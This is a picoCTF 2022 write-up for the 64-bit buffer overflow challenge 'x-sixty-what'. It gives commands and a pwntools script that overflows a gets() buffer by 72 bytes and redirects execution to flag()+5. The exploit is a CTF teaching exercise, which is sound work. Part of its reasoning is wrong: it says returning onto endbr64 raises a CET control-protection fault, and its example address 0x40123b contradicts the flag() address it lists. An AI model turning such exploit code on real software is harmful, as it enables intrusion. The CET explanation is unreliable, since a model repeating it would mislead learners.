Description

A 64-bit buffer overflow with no stack canary. Overflow the stack buffer to control RIP (the 64-bit instruction pointer) and redirect execution to a flag-printing function.

Key difference from 32-bit: 64-bit binaries use registers (RDI, RSI, RDX...) for the first six arguments, and RIP is 8 bytes wide - addresses must be packed with p64().

Setup

Download vuln

Download the binary and make it executable.

Check security mitigations with checksec.

Use pwntools to find the offset and the address of the flag function.

bash

wget https://artifacts.picoctf.net/c/192/vuln && chmod +x vuln

bash

checksec --file=vuln

bash

objdump -d vuln | grep '<flag>'

Solution

Want to try it yourself first?

The guided walkthrough reveals hints one step at a time.

Walk me through it

For a step-by-step walkthrough of stack overflows, ret2win, and ROP scaffolding (cyclic offset, p64 packing, alignment), see the Buffer Overflow Binary Exploitation guide.

Step 1
Identify the offset to RIP (it is 72)
Observation
I noticed the binary has no stack canary (confirmed by checksec) and reads input with gets(), which suggested a classic stack buffer overflow where a cyclic pattern could pinpoint exactly how many bytes reach the saved return address.
Generate a cyclic pattern, crash the binary, and read RSP (not RIP: in 64-bit the crash registers differ) to compute the offset. With this binary, the answer is 72.
bash
# Pipe a cyclic pattern in to crash the binary: cyclic 200 | ./vuln # In GDB, repeat the run and read the value at the top of the stack at the crash: gdb -q ./vuln -ex 'r <<< $(cyclic 200)' -ex 'x/gx $rsp' # Translate the leaked qword back to the offset: python3 -c "from pwn import cyclic_find; print(cyclic_find(0x6161616a61616169, n=8))" # -> 72
What didn't work first
Tried: Reading RIP instead of RSP after the crash to find the cyclic offset
In 64-bit, a ret to a non-canonical address triggers a #GP fault before RIP is updated, so the debugger shows RIP pointing at the ret instruction itself, not at your pattern. RSP holds the top-of-stack value that ret was about to pop, which is where the cyclic bytes land. Always read $rsp at the crash site to get the overwritten saved-rip value.
Tried: Running cyclic_find without the n=8 keyword argument
pwntools cyclic defaults to 4-byte unique substrings (n=4), which means each 4-byte window is unique but 8-byte windows may not be. On a 64-bit stack the overwritten slot is 8 bytes wide, so cyclic_find may return a wrong offset or raise a not-found error. Pass n=8 to both cyclic() and cyclic_find() so the pattern has unique 8-byte substrings matching what x86-64 pops.
Learn more
x86-64 calling convention (System V AMD64 ABI). The first six integer/pointer arguments go in registers in this order: rdi, rsi, rdx, rcx, r8, r9. Floating-point args go in xmm0..xmm7. Additional args go on the stack. Return value comes back in rax. The stack must be 16-byte aligned at the moment of call.
Stack at vuln() ret on x86-64:
high addr +-------------+ | saved rip | <- 8 bytes, payload[72:80] -> &flag() +-------------+ | saved rbp | <- 8 bytes, payload[64:72] +-------------+ | char buf[64]| <- payload[0:64] = "AAAA..." low addr +-------------+ <- rsp at gets()
Why crash diagnostics differ from 32-bit. When ret tries to pop a non-canonical address (bits 48-63 must equal bit 47, otherwise the CPU raises #GP), the fault fires before rip is updated. You will see RIP pointing at the ret instruction, not at your pattern. Read $rsp instead to recover the cyclic bytes:
(gdb) x/gx $rsp 0x7fffffffe018: 0x6161616a61616169 <- this 8-byte value is your pattern (gdb) shell python3 -c "from pwn import *; print(cyclic_find(0x6161616a61616169, n=8))" 72
The n=8 matters: pwntools' default cyclic uses 4-byte unique substrings. For 64-bit, generate with cyclic(200, n=8) so each 8-byte window is unique.
Step 2
Find the flag() function address
Observation
I noticed checksec reported No PIE on the binary, which suggested the flag() function would sit at a fixed virtual address on every run and could be read directly from objdump output without any leak or calculation.
Use objdump or pwntools ELF to locate flag(). Because the binary has no PIE, the address is fixed each run. The objdump line is also a sanity check that the function exists where you expect it.
bash
# Confirm the flag() function exists and note its address: objdump -d vuln | grep '<flag>:' # -> 00000000004011d6 <flag>: python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.symbols['flag']))"
Expected output
```
00000000004011d6 <flag>:
0x4011d6
```
What didn't work first
Tried: Using nm -D vuln to look up the flag() address from dynamic symbols
nm -D only prints symbols exported from the dynamic symbol table (.dynsym), which contains only symbols that need runtime linking. flag() is a local function never intended for external callers, so it appears only in the static symbol table (.symtab). Use objdump -d or nm (without -D) to reach static symbols, or use pwntools ELF which reads .symtab directly.
Tried: Assuming the flag() address stays the same between local and remote runs when PIE is disabled
With no PIE, the binary-relative virtual address is fixed across runs of the same binary. However the remote server may run a slightly different build or a different kernel ASLR configuration for the stack and heap - only the .text segment address is locked. The flag() address from objdump is correct to use for the remote, but always double-check checksec output confirms No PIE before trusting a hardcoded address.
Learn more
Without PIE (Position-Independent Executable), the binary is loaded at a fixed base address every time. checksec shows "No PIE" if this is the case. This means the virtual address of flag() in objdump output is exactly what you write into the payload - no calculation needed.
With PIE enabled, the binary would be loaded at a random base address (ASLR for executables), and you would first need to leak an address from the binary to calculate the actual load address before computing flag()'s runtime address.
Step 3
Build the 64-bit exploit, skipping endbr64
Observation
I noticed that disassembling flag() showed endbr64 as the very first instruction and that jumping directly to it via a ret caused a control-flow fault, which suggested landing at flag() + 5 to skip past the Intel CET marker and into the real function prologue.
Pad 72 bytes, then jump to flag() + 5 (past endbr64 and push rbp). The first instruction of flag() is endbr64, an Intel CET (Control-flow Enforcement Technology) indirect branch tracking marker. When execution arrives at endbr64 via a plain ret rather than an approved indirect call or jmp, the CPU raises a control-flow protection fault and the process dies before printing anything. Skipping 5 bytes lands on mov rbp,rsp - the real function prologue - and the function runs normally.
python
python3 -c " from pwn import * elf = ELF('./vuln') # flag() starts with endbr64 (4 bytes) + push rbp (1 byte); skip both to avoid IBT fault flag_addr = elf.symbols['flag'] + 5 # e.g. 0x40123b payload = b'A' * 72 # offset to RIP payload += p64(flag_addr) # jump past endbr64 into flag() p = remote('saturn.picoctf.net', <PORT_FROM_INSTANCE>) p.sendlineafter(b'string:', payload) print(p.recvall().decode()) "
What didn't work first
Tried: Jumping directly to elf.symbols['flag'] (the endbr64 instruction) instead of flag() + 5
The very first instruction of flag() is endbr64, an Intel CET marker. When execution arrives there via a ret rather than a CET-approved indirect branch, the CPU raises a #CP (Control Protection) fault and the process dies immediately with SIGSEGV before the function body runs. Skipping 5 bytes to land on the mov rbp,rsp instruction bypasses the IBT check entirely.
Tried: Using p32() to pack the flag() address into the payload
p32() packs a value as 4 bytes in little-endian order, which is correct for 32-bit x86 exploits where saved-eip is 4 bytes wide. On x86-64, the saved-rip slot is 8 bytes wide and the full 64-bit address must be packed with p64(). Using p32() writes only the low 4 bytes and leaves 4 garbage bytes in the slot, producing a non-canonical or wrong address that causes a fault on ret.
Learn more
What is endbr64? Intel CET (Control-flow Enforcement Technology) adds the endbr64 instruction (opcode F3 0F 1E FA, 4 bytes; the full 5-byte prologue including the push rbp / endbr64 pairing is sometimes shown together) at the top of every indirectly-callable function. When the CPU executes an indirect branch (call *rax, jmp *rax), it expects the destination to start with endbr64 and sets an internal tracker. If the destination does NOT start with it, or if execution arrives there via a plain ret, the CPU raises a #CP (Control Protection) fault, killing the process. A buffer-overflow ret lands via a ret instruction, which is not an indirect branch in the IBT sense, so CET fires.
Why +5 works. The standard function prologue with CET looks like: endbr64 (4 bytes) followed by push rbp (1 byte) followed by mov rbp,rsp. Jumping to flag() + 5 skips both endbr64 and push rbp and lands directly on mov rbp,rsp. The frame setup still works because RBP gets set correctly from RSP at that point, and the function continues normally to open and print the flag file.
Finding the safe address. Disassemble flag() with objdump -d vuln | grep -A 5 '<flag>:' to see the exact byte layout for this build. The address you want is the one labeled mov rbp,rsp. Alternatively, compute it as elf.symbols['flag'] + 5 in pwntools, which gives the same address directly.
p64(addr) packs a 64-bit address as 8 bytes in little-endian order, which is what x86-64 stores on the stack. This is the 64-bit counterpart of p32() used in 32-bit exploits.

Interactive tools

Cyclic Pattern GeneratorGenerate de Bruijn cyclic patterns and find buffer overflow offsets. The browser equivalent of pwntools cyclic and cyclic_find.
pwntools Payload BuilderPack integers into little-endian bytes (p32 / p64), unpack bytes back to integers, and build flat ROP payloads with offset-based insertion.

Flag

Reveal flag

picoCTF{b1663r_15_b3773r_3...}

Overflow 72 bytes to RIP, then jump to flag()+5 (past the endbr64 IBT marker) to avoid the Intel CET control-flow fault. Pack the 64-bit address with p64().

Key takeaway

Stack buffer overflows in 64-bit binaries follow the same principle as 32-bit: fill the buffer, overwrite the saved return address, and redirect execution. The key differences are that addresses are 8 bytes wide (packed with p64 in little-endian), the calling convention passes arguments in registers rather than on the stack, and Intel CET's endbr64 marker at function entries requires landing a few bytes past the start when arriving via a plain ret. The same ret2win pattern scales up to full ROP chains once no-execute protections are added.

x-sixty-what picoCTF 2022 Solution

Description

Solution

Flag

Key takeaway

Related reading

Tools used in this challenge

What to try next

buffer overflow 1

buffer overflow 2

buffer overflow 0

Guessing Game 1

handoff

offset-cycle